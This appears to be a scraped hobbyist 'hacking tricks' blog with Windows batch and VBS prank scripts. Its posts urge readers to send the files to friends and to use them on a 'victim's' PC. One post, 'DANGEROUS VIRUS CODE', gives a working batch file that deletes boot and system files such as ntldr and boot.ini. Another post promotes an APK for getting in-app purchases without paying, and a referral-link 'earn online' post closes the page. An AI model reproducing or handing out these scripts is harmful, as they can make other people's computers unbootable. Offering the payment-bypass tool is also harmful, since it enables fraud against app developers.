NOTEPAD TRICKS (HACKING)

This trick will Open Notepad continuously automatically
Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

@ECHO off
:trick
START %SystemRoot%\system32\notepad.exe
GOTO trick

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .bat for eg:- notepadtrick.bat
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)
○○☺♦♦♦_____________________________________________________________________○○☺♦♦♦
This trick will pop out error messages again and again
Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

@ECHO off
:Begin
msg * Welcome to hackfact
msg * You are learning cool notepad tricks
msg * Notepad tricks rocks
msg * Using notepad tricks we can even control whole computer
msg * What are your views in all these tricks using notepad
GOTO BEGIN

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .bat for eg:- notepadtrick.bat
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)
○○☺♦♦♦____________________________________________________________________○○☺♦♦♦
Matrix falling notepad trick
After the success of the movie matrix people just started loving matrix pattern , its style. So here is a notepad trick which will show that matrix affect in your command prompt

Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

@echo off
color 02
:tricks
echo %random%%random%%random%notepad%random%%random%tricks%random%%random%%random%%random%%random%
goto tricks

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .bat for eg:- notepadtrick.bat
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)
○○☺♦♦♦____________________________________________________________________○○☺♦♦♦
Notepad and vbsfile tricks combo
Hit Enter Key Continuously
Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .vbs for eg:- notepadtrick.vbs
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)
○○☺♦♦♦____________________________________________________________________○○☺♦♦♦

Press backspace continuously notepad trick (so Let's go back a few steps.)
Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .vbs for eg:- notepadtrick.vbs
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)
○○☺♦♦♦____________________________________________________________________○○☺♦♦♦

Toggle Caps Lock button On-Off Continuously
Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .vbs for eg:- notepadtrick.vbs
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)



Now if u want to disable any of these notepad and vbs trick combo just go do task manager click on process then find wscript.exe and end this process and for all notepad and batch programming tricks combo just restart your computer or close the command prompt.
Category: 0 comments

DANGEROUS VIRUS CODE

In the post Show below virus coding is very dangerous, first open the notepad type code

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

save as in to virus.bat file system
Category: 0 comments

SHUTDOWN VIRUS

This is the virus which let you to shutdown everytime you'll open your pc if you put the file in "startup" folder.















First open notepad and type like show below image















And save in to filename.bat ,open the bat file its display a System shutdown dialogue box within
160 seconds computer will turn off shown below the figure


















ENjoy:)
Category: 0 comments

Optical Drive Door Virus

Guys try this is..... It is a virus code hope you will enjoy by building it and screwing it on VICTIM'S Pc... :P



Open the notepad type the following coding

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set oCD = oWMP.cdromCollection.getByDriveSpecifier("J:") ' or whatever
If vbOK = MsgBox ("Eject?", vbOKCancel) Then
oCD.Eject
If vbOK = MsgBox ("Close?", vbOKCancel) Then
oCD.Eject
End if
End if

And save it in to filename.vbs

NOTE: that's it... try if you want at your own risk.... :)
Category: 0 comments

How To Disable Right Click On Your Website Or Blog

If you own a blog or a website then you always want to prevent other malicious bloggers from copying the content from your blog. You might have written an article with great efforts and lots of research and other just copy/paste it on their blog. To prevent such users from copying content from your blog i will show you Javascript Trick to disable right click on your blog. So lets get started.

How To Disable Right Click On Your Blog ?

1. Got to your blogger Dashboard and then Click on Layout.












  2. Now Click on Add Gadget and select Html/Javascript. 












 3. Now paste code given below in the pop up window. 
  <!--MBW Code-->
  <script language='JavaScript1.2'>
  function disableselect(e){
  return false
  }
  function reEnable(){
  return true
  }
  document.onselectstart=new Function ("return false")
  if (window.sidebar){
  document.onmousedown=disableselect
  document.onclick=reEnable
  }
  </script>
  <!--Code End http://mybloggersworld.blogspot.in>

4. Save it and done.

How to Purchase In-app coins or character free for ANDROID (for root user only)

Guys while playing games in your favorite ANDROID device you might got stuck somewhere which will ask you a money to resume or to play further. This may ruined your mood and make you frustrated. And if you'll anyhow want to buy that thing than you have to pay a big round of money to fulfill your demand. So to overcome this issue and let you to buy IN-APP Purchase free than this might get you in shock. But yes this can happen now with the newly software which is not available in google play but in our well known site. For that you dont have to go anywhere. Just click on the link given below and download it : Freedom click here
This is the only software which will let you to in-app purchase without any cost. and for most thing for this you have the permission for superuser and for that it is important to ROOT YOUR DEVICE for rooting your device i'll discuss further about it for now i'll discuss about how to use this software.

I'll show you how?
click here

1.Install Freedom on your device and launch it.

Make sure that you have "Unknown sources" enabled in your security settings:
Install downloaded APK and launch it (first launch takes a while, please be patient), allow superuser permissions request:

2.Launch application through Freedom

Tap on application in which you want to use free in-app purchase, wait a little. Application should start automatically:
Next, make your in-app purchase (appearing of FreeCard means that Freedom is running successfully):





















From time to time you can receive OTA updates for Freedom, just tap on "Update Available" dialog and update should start automatically. Here is screenshot of running Freedom and update available for download:
You should use Freedom every time you want to use free in-app purchase, e.g. Freedom is a launcher for your apps.
And this program does not work with online applications and will never work with online applications.
If you want to remove Freedom, first launch it, go to MENU, then tap on STOP. Next you can remove Freedom successfully. IF YOU DID NOT DO IT - YOU ARE NOT ABLE TO USE GOOGLE PLAY WITHOUT FREEDOM!
Category: 0 comments

EARN GENUINELY ONLINE

Frnds if u wanna earn sitting at home while operating social networking sites.....do visit this link nd bcum a member!!!!
http://Earnyouth.com/?ref=115779

I have tried and m earning it online after many fake making online earn site i have stopped to one site which is genuinely true.........
so guys dont waste ur time on internet by blankly wasting time......... do something for your earning too....
Click here
Category: 0 comments